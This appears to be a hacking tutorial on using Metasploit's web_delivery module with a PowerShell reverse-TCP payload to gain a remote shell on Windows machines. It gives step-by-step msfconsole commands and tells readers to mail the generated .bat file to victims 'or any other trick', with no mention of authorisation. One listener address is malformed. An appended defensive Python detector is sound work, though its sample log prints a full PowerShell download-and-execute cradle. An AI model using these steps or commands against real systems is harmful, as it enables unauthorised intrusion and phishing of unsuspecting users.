Metasploit has grown over the years and become popular among hackers, script kiddies, penetration testers, cyber security analysts, and information security engineers. The fact that it is open source is one reason for its popularity.
Metasploit can be used to test for a number of different security vulnerabilities and is well known for its evasion and anti-forensic tools. This article focuses on a single technique, which we will call the Metasploit PowerShell Shellcode Injector Hack or simply Web Delivery.
If you are a beginner with Metasploit, read our introduction to what Metasploit is first.
Although the web delivery exploit will work on Windows systems that have Python installed, few Windows systems actually do, while nearly every UNIX, Linux, and OS X system has Python installed by default. Fortunately, those Windows systems do have PowerShell installed by default, and we can use it with Metasploit's web delivery exploit to take control of them.
In this tutorial, we will use Metasploit's web delivery exploit to take control of a Windows system through its PowerShell.
The idea behind this attack is to set up a payload listener that receives incoming connections from Windows-based systems. You run the payload handler and wait for incoming connections after the PowerShell code has been delivered to the target user. When the target user executes that file, a remote session is opened. There are many ways to deliver the PowerShell code to the target user, but we won't be getting into that. Keep in mind that you will need to be on the same network as your target user.
STEP 1: Fire up your Kali Linux and launch Metasploit.
kali > msfconsole
STEP 2: Loading the Web Delivery Exploit
As mentioned above, using Metasploit's web delivery against Windows is very similar to web delivery on Unix, Linux, and OS X systems, except that Windows systems don't have Python installed by default. But they do have Windows PowerShell, and there is a web delivery target for that.
Let's load the web delivery exploit in Metasploit:
msf > use exploit/multi/script/web_delivery
msf > set LHOST 192.1681.153
msf > set LPORT 4444
msf > set URIPATH powersploit
STEP 3: Set the Target to PowerShell
By default, the web delivery exploit in Metasploit uses Python scripts. To use the Windows-based PowerShell option, we need to set the target to 2.
msf > set target 2
With the target set to 2, Metasploit will create a PowerShell script when we are ready to exploit.
STEP 4: Set the Payload
Lastly, we need to set the payload. Let's use the windows/powershell_reverse_tcp payload.
msf > set payload windows/powershell_reverse_tcp
Now, we can type exploit and Metasploit will start a small web server in the background and generate a command for us to use on the Windows system.
As you can see in the image, this command has to be run on the target machine.
Copy this command, paste it into Notepad, save it as a .bat file, and send it by mail or any other trick.
After it executes, you have complete access to the Windows PowerShell.
Type sessions to list the available sessions, and sessions -i 1 to interact with the first one.
You can now type any PowerShell command.
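The delivery chain described above (a .bat file spawning a hidden PowerShell that downloads and runs a script from the listener) is also what a defender should hunt for in process-creation telemetry. The following Python is an added example, not part of this tutorial or of Metasploit: it scores PowerShell command lines for download-cradle indicators; the log line format and the sample records are constructed, and 192.0.2.10 is a documentation address.

```python
import re
from typing import Dict, List

# Indicators typical of PowerShell "download cradle" one-liners, the shape of
# command that web_delivery (target 2) hands to the victim. Pattern -> alert label.
CRADLE_INDICATORS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution (IEX)"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "remote download"),
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(nop|noprofile)\b", re.I), "profile bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I), "download from bare IP"),
]

# Constructed record layout (assumption, not a real product format).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$"
)

def score_command_line(cmdline: str) -> List[str]:
    """Return the labels of every cradle indicator present in one command line."""
    return [label for pattern, label in CRADLE_INDICATORS if pattern.search(cmdline)]

def triage_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Parse constructed process-creation records and flag PowerShell launches
    showing two or more cradle indicators; the parent process is kept for context."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or "powershell" not in m["cmd"].lower():
            continue
        hits = score_command_line(m["cmd"])
        if len(hits) >= 2:
            alerts.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                           "parent": m["parent"], "hits": hits})
    return alerts

# Constructed sample records (not real telemetry): one benign admin command,
# one cradle launched from a .bat via cmd.exe, one scheduled script.
SAMPLE_LOGS = [
    "2024-05-01T10:02:11Z host=WS01 user=alice parent=powershell.exe cmd=powershell.exe -NoProfile -Command Get-Service",
    "2024-05-01T10:05:42Z host=WS01 user=alice parent=cmd.exe cmd=powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/powersploit'))",
    "2024-05-01T10:07:03Z host=WS02 user=bob parent=explorer.exe cmd=powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for alert in triage_logs(SAMPLE_LOGS):
        print(alert)
```

Only the cmd.exe-spawned launch is flagged; a single indicator such as -NoProfile on its own is left alone to keep the rule quiet on routine administration.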